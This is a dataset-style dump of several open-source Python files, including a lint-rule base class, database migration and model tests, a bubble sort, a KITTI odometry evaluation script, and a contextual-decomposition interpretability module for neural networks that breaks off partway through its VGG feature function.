max_stars_repo_path (string, 4-245) | max_stars_repo_name (string, 7-115) | max_stars_count (int64, 101-368k) | id (string, 2-8) | content (string, 6-1.03M)
---|---|---|---|---|
fixit/common/pseudo_rule.py | sk-/Fixit | 313 | 20919 |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
import io
import tokenize
from pathlib import Path
from typing import Iterable, Optional
from fixit.common.report import BaseLintRuleReport
class PseudoContext:
"""
Contains information about the file that `PseudoLintRule.lint_file` should evaluate.
"""
def __init__(
self,
file_path: Path,
source: bytes,
tokens: Optional[Iterable[tokenize.TokenInfo]] = None,
ast_tree: Optional[ast.Module] = None,
) -> None:
self.file_path: Path = file_path
self.source: bytes = source
self._tokens: Optional[Iterable[tokenize.TokenInfo]] = tokens
self._ast_tree: Optional[ast.Module] = ast_tree
@property
def tokens(self) -> Iterable[tokenize.TokenInfo]:
tokens = self._tokens
if tokens is not None:
return tokens
tokens = tuple(tokenize.tokenize(io.BytesIO(self.source).readline))
self._tokens = tokens
return tokens
@property
def ast_tree(self) -> ast.Module:
ast_tree = self._ast_tree
if ast_tree is not None:
return ast_tree
ast_tree = ast.parse(self.source)
self._ast_tree = ast_tree
return ast_tree
class PseudoLintRule(abc.ABC):
"""
Represents a lint rule (or a group of lint rules) that can't be represented by a
normal lint rule. These "pseudo" lint rules receive information about the file from
the `PseudoContext`.
This API is much more flexible than the normal lint rule API, but that comes at a
(potentially large) performance cost. Because the lint framework does not control
traversal of the syntax tree, it cannot batch the execution of these rules alongside
other lint rules.
This API is used for compatibility with Flake8 rules.
"""
def __init__(self, context: PseudoContext) -> None:
self.context: PseudoContext = context
@abc.abstractmethod
def lint_file(self) -> Iterable[BaseLintRuleReport]:
...
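# Illustrative sketch (not part of the original file): a minimal concrete
# PseudoLintRule showing how `PseudoContext` is typically consumed. A real rule
# would yield concrete BaseLintRuleReport instances; this example only walks the
# lazily-parsed AST and returns no reports.
class _ExamplePseudoRule(PseudoLintRule):
    def lint_file(self) -> Iterable[BaseLintRuleReport]:
        reports = []
        for node in ast.walk(self.context.ast_tree):
            if isinstance(node, ast.FunctionDef):
                pass  # inspect `node` and append a report if it violates the rule
        return reports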
|
homeschool/referrals/tests/test_models.py | chriswedgwood/homeschool | 154 | 20920 |
from homeschool.referrals.tests.factories import ReferralFactory
from homeschool.test import TestCase
class TestReferral(TestCase):
def test_factory(self):
referral = ReferralFactory()
assert referral.referring_user is not None
assert referral.created_at is not None
assert referral.status == referral.Status.PENDING
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py | mkrack/aiida-core | 153 | 20951 | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Test update of link labels."""
from uuid import uuid4
from aiida.common import timezone
from aiida.storage.psql_dos.migrator import PsqlDostoreMigrator
def test_legacy_jobcalc_attrs(perform_migrations: PsqlDostoreMigrator):
"""Test update of link labels."""
# starting revision
perform_migrations.migrate_up('django@django_0042')
# setup the database
user_model = perform_migrations.get_current_table('db_dbuser')
node_model = perform_migrations.get_current_table('db_dbnode')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
user = user_model(
email='<EMAIL>',
first_name='John',
last_name='Doe',
institution='EPFL',
)
session.add(user)
session.commit()
node_process = node_model(
uuid=str(uuid4()),
node_type='process.calculation.calcjob.CalcJobNode.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
node_data = node_model(
uuid=str(uuid4()),
node_type='data.core.dict.Dict.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
session.add(node_process)
session.add(node_data)
session.commit()
link = link_model(
input_id=node_data.id,
output_id=node_process.id,
type='input',
label='_return',
)
session.add(link)
session.commit()
link_id = link.id
# final revision
perform_migrations.migrate_up('django@django_0043')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
link = session.get(link_model, link_id)
assert link.label == 'result'
|
ds2/sorting/bubblesort.py | aslisabanci/datastructures | 159 | 20959 | def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
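# Quick usage sketch (illustrative, not part of the original file): bubblesort
# sorts the list in place and returns None.
if __name__ == "__main__":
    data = [5, 2, 4, 1, 3]
    bubblesort(data)
    assert data == [1, 2, 3, 4, 5]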
|
src/westpa/core/reweight/__init__.py | burntyellow/adelman_ci | 140 | 20973 |
'''
Function(s) for the postanalysis toolkit
'''
import logging
log = logging.getLogger(__name__)
from . import _reweight
from ._reweight import (stats_process, reweight_for_c)
from .matrix import FluxMatrix
|
eval_odom.py | nikola3794/kitti-odom-eval | 110 | 20987 | # Copyright (C) <NAME> 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
|
src/cd.py | laura-rieger/deep-explanation-penalization | 105 | 20989 |
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
def propagate_three(a, b, c, activation):
a_contrib = 0.5 * (activation(a + c) - activation(c) + activation(a + b + c) - activation(b + c))
b_contrib = 0.5 * (activation(b + c) - activation(c) + activation(a + b + c) - activation(a + c))
return a_contrib, b_contrib, activation(c)
# propagate tanh nonlinearity
def propagate_tanh_two(a, b):
return 0.5 * (tanh(a) + (tanh(a + b) - tanh(b))), 0.5 * (tanh(b) + (tanh(a + b) - tanh(a)))
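# Note on the two helpers above (verifiable by expanding the terms): the three values
# returned by propagate_three sum to activation(a + b + c), and the two halves returned
# by propagate_tanh_two sum to tanh(a + b), so splitting a pre-activation into a
# relevant and an irrelevant contribution preserves the ordinary forward value.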
# propagate convolutional or linear layer
def propagate_conv_linear(relevant, irrelevant, module, device='cuda'):
bias = module(torch.zeros(irrelevant.size()).to(device))
rel = module(relevant) - bias
irrel = module(irrelevant) - bias
# elementwise proportional
prop_rel = torch.abs(rel)
prop_irrel = torch.abs(irrel)
prop_sum = prop_rel + prop_irrel +stabilizing_constant
prop_rel = torch.div(prop_rel, prop_sum)
prop_irrel = torch.div(prop_irrel, prop_sum)
return rel + torch.mul(prop_rel, bias), irrel + torch.mul(prop_irrel, bias)
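# Note (added for clarity): for affine modules such as Conv2d and Linear, the returned
# pair sums to module(relevant + irrelevant) up to the stabilizing constant -- the layer
# bias is attributed to the two streams in proportion to their magnitudes.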
def propagate_AdaptiveAvgPool2d(relevant, irrelevant, module, device='cuda'):
rel = module(relevant)
irrel = module(irrelevant)
return rel, irrel
# propagate ReLu nonlinearity
def propagate_relu(relevant, irrelevant, activation, device='cuda'):
swap_inplace = False
try: # handles inplace
if activation.inplace:
swap_inplace = True
activation.inplace = False
except:
pass
zeros = torch.zeros(relevant.size()).to(device)
rel_score = activation(relevant)
irrel_score = activation(relevant + irrelevant) - activation(relevant)
if swap_inplace:
activation.inplace = True
return rel_score, irrel_score
# propagate maxpooling operation
def propagate_pooling(relevant, irrelevant, pooler, model_type='mnist'):
if model_type == 'mnist':
unpool = torch.nn.MaxUnpool2d(kernel_size=2, stride=2)
avg_pooler = torch.nn.AvgPool2d(kernel_size=2, stride=2)
window_size = 4
elif model_type == 'vgg':
unpool = torch.nn.MaxUnpool2d(kernel_size=pooler.kernel_size, stride=pooler.stride)
avg_pooler = torch.nn.AvgPool2d(kernel_size=(pooler.kernel_size, pooler.kernel_size),
stride=(pooler.stride, pooler.stride), count_include_pad=False)
window_size = 4
# get both indices
p = deepcopy(pooler)
p.return_indices = True
both, both_ind = p(relevant + irrelevant)
ones_out = torch.ones_like(both)
size1 = relevant.size()
mask_both = unpool(ones_out, both_ind, output_size=size1)
# relevant
rel = mask_both * relevant
rel = avg_pooler(rel) * window_size
# irrelevant
irrel = mask_both * irrelevant
irrel = avg_pooler(irrel) * window_size
return rel, irrel
# propagate dropout operation
def propagate_dropout(relevant, irrelevant, dropout):
return dropout(relevant), dropout(irrelevant)
# get contextual decomposition scores for blob
def cd(blob, im_torch, model, model_type='mnist', device='cuda'):
# set up model
model.eval()
im_torch = im_torch.to(device)
# set up blobs
blob = torch.FloatTensor(blob).to(device)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
if model_type == 'mnist':
scores = []
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant = relevant.view(-1, 800)
irrelevant = irrelevant.view(-1, 800)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
else:
mods = list(model.modules())
for i, mod in enumerate(mods):
t = str(type(mod))
if 'Conv2d' in t or 'Linear' in t:
if 'Linear' in t:
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mod)
elif 'ReLU' in t:
relevant, irrelevant = propagate_relu(relevant, irrelevant, mod)
elif 'MaxPool2d' in t:
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mod, model_type=model_type)
elif 'Dropout' in t:
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mod)
return relevant, irrelevant
# batch of [start, stop) with unigrams working
def cd_batch_text(batch, model, start, stop, my_device = 0):
# rework for
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch.text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if i >= start and i <= stop:
rel_i = rel_i +torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g +torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f +torch.matmul(W_if, word_vecs[i])
rel_o = rel_o +torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i +torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g +torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f +torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o +torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if i >= start and i < stop:
relevant =relevant + bias_contrib_i * bias_contrib_g
else:
irrelevant =irrelevant + bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
#tolerance = 0.001
#assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores, irrel_scores
def cd_text_irreg_scores(batch_text, model, start, stop, my_device = 0):
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch_text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
w_ii_contrib = torch.matmul(W_ii, word_vecs[i])
w_ig_contrib = torch.matmul(W_ig, word_vecs[i])
w_if_contrib = torch.matmul(W_if, word_vecs[i])
w_io_contrib = torch.matmul(W_io, word_vecs[i])
is_in_relevant = ((start <= i) * (i <= stop)).cuda().float()
is_not_in_relevant = 1 - is_in_relevant
rel_i = rel_i + is_in_relevant * w_ii_contrib
rel_g = rel_g + is_in_relevant * w_ig_contrib
rel_f = rel_f + is_in_relevant * w_if_contrib
rel_o = rel_o + is_in_relevant * w_io_contrib
irrel_i = irrel_i + is_not_in_relevant * w_ii_contrib
irrel_g = irrel_g + is_not_in_relevant * w_ig_contrib
irrel_f = irrel_f + is_not_in_relevant * w_if_contrib
irrel_o = irrel_o + is_not_in_relevant * w_io_contrib
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
bias_contrib =bias_contrib_i * bias_contrib_g
is_in_relevant_bias = ((start <= i) * (i < stop)).cuda().float()
is_not_in_relevant_bias = 1- is_in_relevant_bias
relevant =relevant + is_in_relevant_bias*bias_contrib
irrelevant =irrelevant + is_not_in_relevant_bias*bias_contrib
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
return scores, irrel_scores
def cd_text(batch, model, start, stop, batch_id = 0,my_device = 0):
# rework for
weights = model.lstm.state_dict()
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights['weight_ih_l0'], 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights['weight_hh_l0'], 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights['bias_ih_l0'] + weights['bias_hh_l0'], 4)
word_vecs = model.embed(batch.text)[:, batch_id].data
T = word_vecs.shape[0]
relevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
relevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
for i in range(T):
if i > 0:
prev_rel_h = relevant_h[i - 1]
prev_irrel_h = irrelevant_h[i - 1]
else:
prev_rel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
prev_irrel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if start <= i <= stop:
rel_i = rel_i + torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g + torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f + torch.matmul(W_if, word_vecs[i])
rel_o = rel_o + torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i + torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g + torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f + torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o + torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i, sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g, tanh)
relevant[i] = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant[i] = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (
rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if start <= i <= stop:
relevant[i] += bias_contrib_i * bias_contrib_g
else:
irrelevant[i] += bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f, sigmoid)
relevant[i] += (rel_contrib_f + bias_contrib_f) * relevant[i - 1]
irrelevant[i] += (rel_contrib_f + irrel_contrib_f + bias_contrib_f) * irrelevant[i - 1] + irrel_contrib_f * \
relevant[i - 1]
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o)
#rel_contrib_o, irrel_contrib_o, bias_contrib_o = propagate_three(rel_o, irrel_o, b_o, sigmoid)
new_rel_h, new_irrel_h = propagate_tanh_two(relevant[i], irrelevant[i])
relevant_h[i] = o * new_rel_h
irrelevant_h[i] = o * new_irrel_h
W_out = model.hidden_to_label.weight.data
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h[T - 1])
irrel_scores = torch.matmul(W_out, irrelevant_h[T - 1])
tolerance = 0.001
assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores
def softmax_out(output):
return torch.nn.functional.softmax(torch.stack((output[0].reshape(-1),output[1].reshape(-1)), 1), dim = 1)
def is_in_relevant_toy(batch, start, stop, class_rules):
#XXX only for current model where relevant bigger five
rel_digits = ((batch.label ==0)[None, :] *(batch.text ==class_rules[0])) + (batch.label ==1)[None, :] *(batch.text ==class_rules[1])
relevant = rel_digits[start:stop].sum(dim=0)
irrelevant = rel_digits.sum(dim=0) - relevant
test_out = torch.cat((relevant[:, None], irrelevant[:, None]), 1)
return test_out
def cd_penalty_for_one_toy(batch, model1, start, stop,class_rules):
# get output
model1_output = cd_batch_text(batch, model1, start, stop)
# only use the correct class
correct_idx = (batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
model2_softmax = is_in_relevant_toy(batch, start, stop,class_rules).cuda().float()
output = -(torch.log(model1_softmax)*model2_softmax).mean()
return output
def is_in_relevant_decoy(batch, start, stop, class_rules):
is_decoy = ((batch.label ==0) *(batch.text[start:stop] ==class_rules[0]) + (batch.label ==1) *(batch.text[start:stop] ==class_rules[1]))
return is_decoy.sum(dim=0)
def cd_penalty_for_one_decoy(batch, model1, start, stop,class_rules):
model1_output = cd_batch_text(batch, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
mask_decoy_in_relevant = is_in_relevant_decoy(batch, start, stop,class_rules).cuda()
if mask_decoy_in_relevant.byte().any():
masked_relevant = model1_softmax[:,1].masked_select(mask_decoy_in_relevant.byte())
output = -(torch.log(masked_relevant)).mean()
return output
else:
return torch.zeros(1).cuda()
def cd_penalty_annotated(batch, model1, start, stop, scores):
# get index where annotation present:
idx_nonzero = (start != -1).nonzero()[:,0] # find the ones where annotation exists
model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0] #get the output and focus on relevant scores for class 0 vs 1
model_softmax = torch.nn.functional.softmax(model_output, dim =0)[batch.label[idx_nonzero],np.arange(len(idx_nonzero))] #take softmax of class 0 vs 1 and take the correct digit
output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() #-(torch.log(1-model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #if it agrees, maximize - if it dis, min
return output
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
def cd_penalty_for_one_decoy_all(batch, model1, start, stop):
mask_exists =(start!=-1).byte().cuda()
if mask_exists.any():
model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
wrong_idx = (1-batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx])) #+ softmax_out((model1_output[0][wrong_idx],model1_output[1][wrong_idx]))
output = (torch.log(model1_softmax[:,1])).masked_select(mask_exists)
return -output.mean()
else:
return torch.zeros(1).cuda()
def cd_penalty(batch, model1, model2, start, stop):
model1_output = cd_batch_text(batch, model1, start, stop)
model2_output = cd_batch_text(batch, model2, start, stop)
model1_softmax = softmax_out(model1_output)
model2_softmax = softmax_out(model2_output)
return ((model1_softmax-model2_softmax)*(torch.log(model1_softmax) - torch.log(model2_softmax))).sum(dim=1).reshape((2,-1)).sum(dim=0)
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
def cd_vgg_features(blob,im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
